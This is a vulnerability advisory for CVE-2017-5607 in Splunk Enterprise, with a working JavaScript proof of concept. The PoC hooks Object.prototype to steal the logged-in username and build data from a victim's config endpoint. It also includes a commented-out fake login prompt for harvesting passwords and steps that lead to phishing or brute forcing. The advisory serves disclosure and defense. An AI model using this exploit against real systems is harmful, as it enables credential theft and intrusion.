Splunk Enterprise - Information Disclosure Vulnerability

[+] Credits: John Page AKA hyp3rlinx    
 
Vendor:
===============
www.splunk.com
 
 
 
Product:
==================
Splunk Enterprise 
 
 
Splunk provides the leading platform for Operational Intelligence. Customers use Splunk to search, monitor, analyze
and visualize machine data. Splunk Enterprise, collects and analyzes high volumes of machine-generated data.
 
 
 
Vulnerability Type:
==================================
Javascript (JSON) Information Theft
 
 
 
CVE Reference:
==============
CVE-2017-5607
 
 
 
Security Issue:
================
Attackers can siphon information from Splunk Enterprise if an authenticated Splunk user visits a malicious webpage.
Some useful data gained is the currently logged in username and if remote user setting is enabled. After, the username
can be use to Phish or Brute Force Splunk Enterprise login. Additional information stolen may aid in furthering attacks.
 
Root cause is the global Window JS variable assignment of config?autoload=1 '$C'.
 
e.g.
 
window.$C = {"BUILD_NUMBER": 207789, "SPLUNKD_PATH"... etc... }
 
To steal information we simply can define a function to be called when the '$C' JS property is "set" on webpage, for example.
Object.defineProperty( Object.prototype, "$C", { set:function(val){...
 
The Object prototype is a Object that every other object inherits from in JavaScript, if we create a setter on the name of our target
in this case "$C", we can get/steal the value of this data, in this case it is very easy as it is assigned to global Window namespace.
 
 
Affected Splunk Enterprise versions:
6.5.x before 6.5.3
6.4.x before 6.4.6
6.3.x before 6.3.10
6.2.x before 6.2.13.1
6.1.x before 6.1.13
6.0.x before 6.0.14
5.0.x before 5.0.18 and Splunk Light before 6.5.2
 
Vulnerability could allow a remote attacker to obtain logged-in username and Splunk version-related information via JavaScript.
 
 
References:
=============
https://www.splunk.com/view/SP-CAAAPZ3
https://www.splunk.com/view/SP-CAAAPZ3#InformationLeakageviaJavaScriptCVE20175607
 
 
 
Exploit/POC:
=============
 
Reproduction:
 
1) Log into Splunk
2) place the below Javascript in webpage on another server.
 
"Splunk-Data-Theft.html"  
 
<script>
Object.defineProperty( Object.prototype, "$C", { set:function(val){ 
   //prompt("Splunk Timed out:\nPlease Login to Splunk\nUsername: "+val.USERNAME, "Password")
for(var i in val){
 alert(""+i+" "+val[i]);
  }
 }
});
</script>
 
 
<script src="https://VICTIM-IP:8000/en-US/config?autoload=1"></script>
 
 
3) Visit the server hosting the "Splunk-Data-Theft.html" webpage, grab current authenticated user
4) Phish or brute force the application.
 
 
 
Video POC URL:
===============
https://vimeo.com/210634562

#  0day.today [2018-01-02]  #